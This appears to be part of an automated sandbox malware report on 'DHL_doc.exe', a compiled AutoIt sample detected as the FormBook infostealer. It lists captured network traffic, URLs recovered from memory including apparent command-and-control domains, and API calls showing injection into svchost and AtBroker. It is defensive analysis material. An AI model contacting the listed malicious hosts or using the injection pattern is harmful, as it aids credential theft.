6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 07 Nov 2024 07:11:47 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->

Source: AtBroker.exe, 00000004.00000002.3566599950.0000000005FBE000.00000004.10000000.00040000.00000000.sdmp, hubOySeXSAbhw.exe, 00000007.00000002.3566096015.0000000003BDE000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://premium303max.rest/4sq5/?NbcPAHe=auinYk/N7fzuxFx4AOK1CjEJadf5mPDXxmAc
Source: hubOySeXSAbhw.exe, 00000007.00000002.3567573313.00000000054D1000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.68529.xyz
Source: hubOySeXSAbhw.exe, 00000007.00000002.3567573313.00000000054D1000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.68529.xyz/2su7/
Source: AtBroker.exe, 00000004.00000003.2185544686.000000000819D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: AtBroker.exe, 00000004.00000003.2185544686.000000000819D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: AtBroker.exe, 00000004.00000003.2185544686.000000000819D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: AtBroker.exe, 00000004.00000003.2185544686.000000000819D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: AtBroker.exe, 00000004.00000003.2185544686.000000000819D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: AtBroker.exe, 00000004.00000003.2185544686.000000000819D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: AtBroker.exe, 00000004.00000003.2185544686.000000000819D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: AtBroker.exe, 00000004.00000002.3566599950.00000000057E4000.00000004.10000000.00040000.00000000.sdmp, hubOySeXSAbhw.exe, 00000007.00000002.3566096015.0000000003404000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2289880564.000000001C5D4000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://help.reg.ru/support/ssl-sertifikaty/1-etap-zakaz-ssl-sertifikata/kak-zakazat-besplatnyy-ssl-
Source: AtBroker.exe, 00000004.00000002.3565066450.0000000002FD7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: AtBroker.exe, 00000004.00000002.3565066450.0000000002FD7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: AtBroker.exe, 00000004.00000002.3565066450.0000000002FD7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: AtBroker.exe, 00000004.00000002.3565066450.0000000002FD7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: AtBroker.exe, 00000004.00000002.3565066450.0000000002FD7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: AtBroker.exe, 00000004.00000002.3565066450.0000000002FD7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: AtBroker.exe, 00000004.00000003.2175252047.0000000008170000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: AtBroker.exe, 00000004.00000002.3566599950.00000000057E4000.00000004.10000000.00040000.00000000.sdmp, hubOySeXSAbhw.exe, 00000007.00000002.3566096015.0000000003404000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2289880564.000000001C5D4000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://parking.reg.ru/script/get_domain_data?domain_name=www.dpo-medicina.online&rand=
Source: AtBroker.exe, 00000004.00000002.3566599950.00000000057E4000.00000004.10000000.00040000.00000000.sdmp, hubOySeXSAbhw.exe, 00000007.00000002.3566096015.0000000003404000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2289880564.000000001C5D4000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://reg.ru
Source: AtBroker.exe, 00000004.00000003.2185544686.000000000819D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: AtBroker.exe, 00000004.00000002.3566599950.0000000006150000.00000004.10000000.00040000.00000000.sdmp, AtBroker.exe, 00000004.00000002.3568220560.0000000007E40000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000004.00000002.3566599950.0000000005976000.00000004.10000000.00040000.00000000.sdmp, hubOySeXSAbhw.exe, 00000007.00000002.3566096015.0000000003596000.00000004.00000001.00040000.00000000.sdmp, hubOySeXSAbhw.exe, 00000007.00000002.3566096015.0000000003D70000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: AtBroker.exe, 00000004.00000003.2185544686.000000000819D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: AtBroker.exe, 00000004.00000002.3566599950.00000000057E4000.00000004.10000000.00040000.00000000.sdmp, hubOySeXSAbhw.exe, 00000007.00000002.3566096015.0000000003404000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2289880564.000000001C5D4000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.reg.ru/dedicated/?utm_source=www.dpo-medicina.online&utm_medium=parking&utm_campaign=s_l
Source: AtBroker.exe, 00000004.00000002.3566599950.00000000057E4000.00000004.10000000.00040000.00000000.sdmp, hubOySeXSAbhw.exe, 00000007.00000002.3566096015.0000000003404000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2289880564.000000001C5D4000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.reg.ru/domain/new/?utm_source=www.dpo-medicina.online&utm_medium=parking&utm_campaign=s_
Source: AtBroker.exe, 00000004.00000002.3566599950.00000000057E4000.00000004.10000000.00040000.00000000.sdmp, hubOySeXSAbhw.exe, 00000007.00000002.3566096015.0000000003404000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2289880564.000000001C5D4000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.reg.ru/hosting/?utm_source=www.dpo-medicina.online&utm_medium=parking&utm_campaign=s_lan
Source: AtBroker.exe, 00000004.00000002.3566599950.00000000057E4000.00000004.10000000.00040000.00000000.sdmp, hubOySeXSAbhw.exe, 00000007.00000002.3566096015.0000000003404000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2289880564.000000001C5D4000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.reg.ru/sozdanie-saita/
Source: AtBroker.exe, 00000004.00000002.3566599950.00000000057E4000.00000004.10000000.00040000.00000000.sdmp, hubOySeXSAbhw.exe, 00000007.00000002.3566096015.0000000003404000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2289880564.000000001C5D4000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.reg.ru/whois/?check=&dname=www.dpo-medicina.online&reg_source=parking_auto

Source: C:\Users\user\Desktop\DHL_doc.exe

Code function: 0_2_00F3EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

0_2_00F3EAFF

Source: C:\Users\user\Desktop\DHL_doc.exe

Code function: 0_2_00F3ED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_00F3ED6A

Source: C:\Users\user\Desktop\DHL_doc.exe

0_2_00F3EAFF

Source: C:\Users\user\Desktop\DHL_doc.exe

Code function: 0_2_00F2AA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,

0_2_00F2AA57

Source: C:\Users\user\Desktop\DHL_doc.exe

Code function: 0_2_00F59576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

0_2_00F59576

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 1.2.svchost.exe.600000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.600000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.3567573313.0000000005450000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3566004775.0000000004B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3566049277.0000000004BE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3564847310.0000000002E90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1958580078.00000000071C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1951242862.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1951751697.0000000003800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3565909815.0000000002B80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

System Summary

Binary is likely a compiled AutoIt script file

Source: DHL_doc.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: DHL_doc.exe, 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_115f3a32-b
Source: DHL_doc.exe, 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_c605a833-d
Source: DHL_doc.exe	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_1b90240b-4
Source: DHL_doc.exe	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_4ed68293-1

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: DHL_doc.exe

Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0062C5C3 NtClose,	1_2_0062C5C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03172B60 NtClose,LdrInitializeThunk,	1_2_03172B60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03172DF0 NtQuerySystemInformation,LdrInitializeThunk,	1_2_03172DF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031735C0 NtCreateMutant,LdrInitializeThunk,	1_2_031735C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03174340 NtSetContextThread,	1_2_03174340
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03174650 NtSuspendThread,	1_2_03174650
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03172B80 NtQueryInformationFile,	1_2_03172B80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03172BA0 NtEnumerateValueKey,	1_2_03172BA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03172BF0 NtAllocateVirtualMemory,	1_2_03172BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03172BE0 NtQueryValueKey,	1_2_03172BE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03172AB0 NtWaitForSingleObject,	1_2_03172AB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03172AD0 NtReadFile,	1_2_03172AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03172AF0 NtWriteFile,	1_2_03172AF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03172F30 NtCreateSection,	1_2_03172F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03172F60 NtCreateProcessEx,	1_2_03172F60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03172F90 NtProtectVirtualMemory,	1_2_03172F90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03172FB0 NtResumeThread,	1_2_03172FB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03172FA0 NtQuerySection,	1_2_03172FA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03172FE0 NtCreateFile,	1_2_03172FE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03172E30 NtWriteVirtualMemory,	1_2_03172E30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03172E80 NtReadVirtualMemory,	1_2_03172E80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03172EA0 NtAdjustPrivilegesToken,	1_2_03172EA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03172EE0 NtQueueApcThread,	1_2_03172EE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03172D10 NtMapViewOfSection,	1_2_03172D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03172D00 NtSetInformationFile,	1_2_03172D00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03172D30 NtUnmapViewOfSection,	1_2_03172D30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03172DB0 NtEnumerateKey,	1_2_03172DB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03172DD0 NtDelayExecution,	1_2_03172DD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03172C00 NtQueryInformationProcess,	1_2_03172C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03172C70 NtFreeVirtualMemory,	1_2_03172C70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03172C60 NtCreateKey,	1_2_03172C60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03172CA0 NtQueryInformationToken,	1_2_03172CA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03172CC0 NtQueryVirtualMemory,	1_2_03172CC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03172CF0 NtOpenProcess,	1_2_03172CF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03173010 NtOpenDirectoryObject,	1_2_03173010
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03173090 NtSetValueKey,	1_2_03173090
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031739B0 NtGetContextThread,	1_2_031739B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03173D10 NtOpenProcessToken,	1_2_03173D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03173D70 NtOpenThread,	1_2_03173D70
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_04E44650 NtSuspendThread,LdrInitializeThunk,	4_2_04E44650
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_04E44340 NtSetContextThread,LdrInitializeThunk,	4_2_04E44340
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_04E42CA0 NtQueryInformationToken,LdrInitializeThunk,	4_2_04E42CA0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_04E42C60 NtCreateKey,LdrInitializeThunk,	4_2_04E42C60
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_04E42C70 NtFreeVirtualMemory,LdrInitializeThunk,	4_2_04E42C70
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_04E42DF0 NtQuerySystemInformation,LdrInitializeThunk,	4_2_04E42DF0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_04E42DD0 NtDelayExecution,LdrInitializeThunk,	4_2_04E42DD0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_04E42D30 NtUnmapViewOfSection,LdrInitializeThunk,	4_2_04E42D30
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_04E42D10 NtMapViewOfSection,LdrInitializeThunk,	4_2_04E42D10
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_04E42EE0 NtQueueApcThread,LdrInitializeThunk,	4_2_04E42EE0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_04E42E80 NtReadVirtualMemory,LdrInitializeThunk,	4_2_04E42E80
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_04E42FE0 NtCreateFile,LdrInitializeThunk,	4_2_04E42FE0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_04E42FB0 NtResumeThread,LdrInitializeThunk,	4_2_04E42FB0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_04E42F30 NtCreateSection,LdrInitializeThunk,	4_2_04E42F30
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_04E42AF0 NtWriteFile,LdrInitializeThunk,	4_2_04E42AF0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_04E42AD0 NtReadFile,LdrInitializeThunk,	4_2_04E42AD0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_04E42BE0 NtQueryValueKey,LdrInitializeThunk,	4_2_04E42BE0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_04E42BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	4_2_04E42BF0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_04E42BA0 NtEnumerateValueKey,LdrInitializeThunk,	4_2_04E42BA0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_04E42B60 NtClose,LdrInitializeThunk,	4_2_04E42B60
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_04E435C0 NtCreateMutant,LdrInitializeThunk,	4_2_04E435C0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_04E439B0 NtGetContextThread,LdrInitializeThunk,	4_2_04E439B0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_04E42CF0 NtOpenProcess,	4_2_04E42CF0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_04E42CC0 NtQueryVirtualMemory,	4_2_04E42CC0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_04E42C00 NtQueryInformationProcess,	4_2_04E42C00
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_04E42DB0 NtEnumerateKey,	4_2_04E42DB0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_04E42D00 NtSetInformationFile,	4_2_04E42D00
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_04E42EA0 NtAdjustPrivilegesToken,	4_2_04E42EA0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_04E42E30 NtWriteVirtualMemory,	4_2_04E42E30
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_04E42FA0 NtQuerySection,	4_2_04E42FA0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_04E42F90 NtProtectVirtualMemory,	4_2_04E42F90
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_04E42F60 NtCreateProcessEx,	4_2_04E42F60
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_04E42AB0 NtWaitForSingleObject,	4_2_04E42AB0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_04E42B80 NtQueryInformationFile,	4_2_04E42B80
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_04E43090 NtSetValueKey,	4_2_04E43090
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_04E43010 NtOpenDirectoryObject,	4_2_04E43010
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_04E43D70 NtOpenThread,	4_2_04E43D70
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_04E43D10 NtOpenProcessToken,	4_2_04E43D10
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_02EB9330 NtReadFile,	4_2_02EB9330
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_02EB91C0 NtCreateFile,	4_2_02EB91C0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_02EB9620 NtAllocateVirtualMemory,	4_2_02EB9620
